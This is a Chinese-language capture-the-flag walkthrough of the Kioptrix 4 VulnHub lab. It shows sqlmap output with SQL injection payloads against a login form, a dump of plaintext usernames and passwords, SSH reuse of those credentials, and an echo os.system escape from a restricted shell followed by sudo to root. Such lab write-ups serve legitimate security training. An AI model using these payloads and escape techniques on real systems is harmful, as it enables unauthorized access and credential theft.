[02:23:04] [INFO] testing 'MySQL UNION query (92) - 41 to 60 columns'
[02:23:04] [INFO] testing 'MySQL UNION query (92) - 61 to 80 columns'
[02:23:04] [INFO] testing 'MySQL UNION query (92) - 81 to 100 columns'
[02:23:04] [INFO] checking if the injection point on POST parameter 'mypassword' is a false positive
POST parameter 'mypassword' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 3642 HTTP(s) requests:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=password' AND 2998=(SELECT (CASE WHEN (2998=2998) THEN 2998 ELSE (SELECT 1575 UNION SELECT 8881) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: myusername=admin&mypassword=password' OR SLEEP(5)-- YZLX&Submit=Login
---
[02:23:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: Apache 2.2.8, PHP 5.2.4
back-end DBMS: MySQL >= 5.0.12
[02:23:14] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.187.133'
[02:23:14] [WARNING] your sqlmap version is outdated
[*] ending @ 02:23:14 /2022-12-05/
表明存在SQL注入漏洞,来看一下有什么数据库?
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# sqlmap -r req.txt --level=3 --schema 2 ⨯
___
__H__
___ ___[,]_____ ___ ___ {1.6.3#stable}
|_ -| . [.] | .'| . |
|___|_ ["]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:26:01 /2022-12-05/
[02:26:01] [INFO] parsing HTTP request from 'req.txt'
[02:26:01] [INFO] resuming back-end DBMS 'mysql'
[02:26:01] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=password' AND 2998=(SELECT (CASE WHEN (2998=2998) THEN 2998 ELSE (SELECT 1575 UNION SELECT 8881) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: myusername=admin&mypassword=password' OR SLEEP(5)-- YZLX&Submit=Login
---
[02:26:01] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:26:01] [INFO] enumerating database management system schema
[02:26:01] [INFO] fetching database names
[02:26:01] [INFO] fetching number of databases
[02:26:01] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:26:01] [INFO] retrieved: 3
[02:26:01] [INFO] retrieved: information_schema
[02:26:02] [INFO] retrieved: members
[02:26:02] [INFO] retrieved: mysql
[02:26:02] [INFO] fetching tables for databases: 'information_schema, members, mysql'
[02:26:02] [INFO] fetching number of tables for database 'information_schema'
[02:26:02] [INFO] retrieved: 17
[02:26:02] [INFO] retrieved: CHARACTER_SETS
[02:26:03] [INFO] retrieved: COLLATIONS
[02:26:03] [INFO] retrieved: COLLATION_CHARACTER_SET_APPLICABILITY
[02:26:04] [INFO] retrieved: COLUMNS
[02:26:04] [INFO] retrieved: COLUMN_PRIVILEGES
[02:26:05] [INFO] retrieved: KEY_COLUMN_USAGE
[02:26:05] [INFO] retrieved: PROFILING
[02:26:05] [INFO] retrieved: ROUTINES
[02:26:06] [INFO] retrieved: SCHEMATA
[02:26:06] [INFO] retrieved: SCHEMA_PRIVILEGES
[02:26:06] [INFO] retrieved: STATISTICS
[02:26:07] [INFO] retrieved: TABLES
[02:26:07] [INFO] retrieved: TABLE_CONSTRAINTS
[02:26:08] [INFO] retrieved: TABLE_PRIVILEGES
[02:26:08] [INFO] retrieved: TRIGGERS
[02:26:08] [INFO] retrieved: USER_PRIVILEGES
[02:26:09] [INFO] retrieved: VIEWS
[02:26:09] [INFO] fetching number of tables for database 'members'
[02:26:09] [INFO] retrieved: 1
[02:26:09] [INFO] retrieved: members
[02:26:09] [INFO] fetching number of tables for database 'mysql'
[02:26:09] [INFO] retrieved: 17
[02:26:09] [INFO] retrieved: columns_priv
[02:26:10] [INFO] retrieved: db
[02:26:10] [INFO] retrieved: func
[02:26:10] [INFO] retrieved: help_category
[02:26:10] [INFO] retrieved: help_keyword
[02:26:10] [INFO] retrieved: help_relation
[02:26:11] [INFO] retrieved: help_topic
[02:26:11] [INFO] retrieved: host
[02:26:11] [INFO] retrieved: proc
[02:26:11] [INFO] retrieved: procs_priv
[02:26:11] [INFO] retrieved: tables_priv
[02:26:12] [INFO] retrieved: time_zone
[02:26:12] [INFO] retrieved: time_zone_leap_second
[02:26:12] [INFO] retrieved: time_zone_name
[02:26:12] [INFO] retrieved: time_zone_transition
[02:26:13] [INFO] retrieved: time_zone_transition_type
[02:26:13] [INFO] retrieved: user
[02:26:13] [INFO] fetched tables: 'information_schema.TRIGGERS', 'information_schema.TABLE_CONSTRAINTS', 'information_schema.USER_PRIVILEGES', 'information_schema.COLUMNS', 'information_schema.SCHEMATA', 'information_schema.VIEWS', 'information_schema.COLLATIONS', 'information_schema.TABLES', 'information_schema.SCHEMA_PRIVILEGES', 'information_schema.COLLATION_CHARACTER_SET_APPLICABILITY', 'information_schema.COLUMN_PRIVILEGES', 'information_schema.KEY_COLUMN_USAGE', 'information_schema.STATISTICS', 'information_schema.TABLE_PRIVILEGES', 'information_schema.CHARACTER_SETS', 'information_schema.PROFILING', 'information_schema.ROUTINES', 'members.members', 'mysql.procs_priv', 'mysql.time_zone_name', 'mysql.host', 'mysql.time_zone_transition_type', 'mysql.tables_priv', 'mysql.time_zone_leap_second', 'mysql.help_relation', 'mysql.func', 'mysql.db', 'mysql.time_zone_transition', 'mysql.proc', 'mysql.help_category', 'mysql.columns_priv', 'mysql.help_keyword', 'mysql.time_zone', 'mysql.help_topic', 'mysql.user'
[02:26:13] [INFO] fetching columns for table 'TRIGGERS' in database 'information_schema'
[02:26:13] [INFO] retrieved: 19
[02:26:13] [INFO] retrieved: TRIGGER_CATALOG
[02:26:14] [INFO] retrieved: varchar(512)
[02:26:14] [INFO] retrieved: TRIGGER_SCHEMA
[02:26:15] [INFO] retrieved: varchar(64)
[02:26:15] [INFO] retrieved: TRIGGER_NAME
[02:26:15] [INFO] retrieved: varchar(64)
[02:26:16] [INFO] retrieved: EVENT_MANIPULATION
[02:26:16] [INFO] retrieved: varchar(6)
[02:26:17] [INFO] retrieved: EVENT_OBJECT_CATALOG
[02:26:17] [INFO] retrieved: varchar(512)
[02:26:18] [INFO] retrieved: EVENT_OBJECT_SCHEMA
[02:26:19] [INFO] retrieved: varchar(64)
[02:26:19] [INFO] retrieved: EVENT_OBJECT_TABLE
[02:26:20] [INFO] retrieved: varchar(64)
[02:26:20] [INFO] retrieved: ACTION_ORDER
[02:26:20] [INFO] retrieved: bigint(4)
[02:26:21] [INFO] retrieved: ACTION_CONDITION
[02:26:21] [INFO] retrieved: longtext
[02:26:21] [INFO] retrieved: ACTION_STATEMENT
[02:26:22] [INFO] retrieved: longtext
[02:26:22] [INFO] retrieved:
[02:26:22] [INFO] retrieved:
接下来看有什么表,并将数据dump下来:
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# sqlmap -r req.txt --level=3 -D members -T members --dump
___
__H__
___ ___[']_____ ___ ___ {1.6.3#stable}
|_ -| . ["] | .'| . |
|___|_ [(]_|_|_|__,| _|
|_|V... |_| https://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting @ 02:30:48 /2022-12-05/
[02:30:48] [INFO] parsing HTTP request from 'req.txt'
[02:30:48] [INFO] resuming back-end DBMS 'mysql'
[02:30:48] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: mypassword (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
Payload: myusername=admin&mypassword=password' AND 2998=(SELECT (CASE WHEN (2998=2998) THEN 2998 ELSE (SELECT 1575 UNION SELECT 8881) END))-- -&Submit=Login
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: myusername=admin&mypassword=password' OR SLEEP(5)-- YZLX&Submit=Login
---
[02:30:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL >= 5.0.12
[02:30:48] [INFO] fetching columns for table 'members' in database 'members'
[02:30:48] [INFO] resumed: 3
[02:30:48] [INFO] resumed: id
[02:30:48] [INFO] resumed: username
[02:30:48] [INFO] resumed: password
[02:30:48] [INFO] fetching entries for table 'members' in database 'members'
[02:30:48] [INFO] fetching number of entries for table 'members' in database 'members'
[02:30:48] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[02:30:48] [INFO] retrieved: 2
[02:30:48] [INFO] retrieved: 1
[02:30:48] [INFO] retrieved: MyNameIsJohn
[02:30:48] [INFO] retrieved: john
[02:30:49] [INFO] retrieved: 2
[02:30:49] [INFO] retrieved: ADGAdsafdfwt4gadfga==
[02:30:49] [INFO] retrieved: robert
Database: members
Table: members
[2 entries]
+----+-----------------------+----------+
| id | password | username |
+----+-----------------------+----------+
| 1 | MyNameIsJohn | john |
| 2 | ADGAdsafdfwt4gadfga== | robert |
+----+-----------------------+----------+
[02:30:49] [INFO] table 'members.members' dumped to CSV file '/root/.local/share/sqlmap/output/192.168.187.133/dump/members/members.csv'
[02:30:49] [INFO] fetched data logged to text files under '/root/.local/share/sqlmap/output/192.168.187.133'
[02:30:49] [WARNING] your sqlmap version is outdated
[*] ending @ 02:30:49 /2022-12-05/
发现了用户名和密码,也许也可以用于SSH,试一下:
┌──(root💀kali)-[~/Vulnhub/Kioprtix4]
└─# ssh john@192.168.187.133 -oHostKeyAlgorithms=+ssh-dss 255 ⨯
The authenticity of host '192.168.187.133 (192.168.187.133)' can't be established.
DSA key fingerprint is SHA256:l2Z9xv+mXqcandVHZntyNeV1loP8XoFca+R/2VbroAw.
This host key is known by the following other names/addresses:
~/.ssh/known_hosts:7: [hashed name]
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.187.133' (DSA) to the list of known hosts.
john@192.168.187.133's password:
Welcome to LigGoat Security Systems - We are Watching
== Welcome LigGoat Employee ==
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ id
*** unknown command: id
john:~$ ?
cd clear echo exit help ll lpath ls
john:~$ ls
john:~$
发现这是一个功能受限的shell,发现可以利用echo命令进行逃逸
LigGoat Shell is in place so you don't screw up
Type '?' or 'help' to get the list of allowed commands
john:~$ echo os.system("/bin/bash")
john@Kioptrix4:~$
john@Kioptrix4:~$ sudo -l
[sudo] password for john:
User john may run the following commands on this host:
(ALL) ALL
john@Kioptrix4:~$ sudo -u root /bin/bash
root@Kioptrix4:~# cd /root
root@Kioptrix4:/root# ls
congrats.txt lshell-0.9.12
root@Kioptrix4:/root# cat congrats.txt
Congratulations!
You've got root.
There is more then one way to get root on this system. Try and find them.
I've only tested two (2) methods, but it doesn't mean there aren't more.
As always there's an easy way, and a not so easy way to pop this box.
Look for other methods to get root privileges other than running an exploit.
It took a while to make this. For one it's not as easy as it may look, and
also work and family life are my priorities. Hobbies are low on my list.
Really hope you enjoyed this one.
If you haven't already, check out the other VMs available on:
www.kioptrix.com
Thanks for playing,
loneferret
root@Kioptrix4:/root#
成功提权,并拿到root flag
经验教训
- 本靶机的关键是如果利用echo命令逃避受限的shell
STRIVE FOR PROGRESS,NOT FOR PERFECTION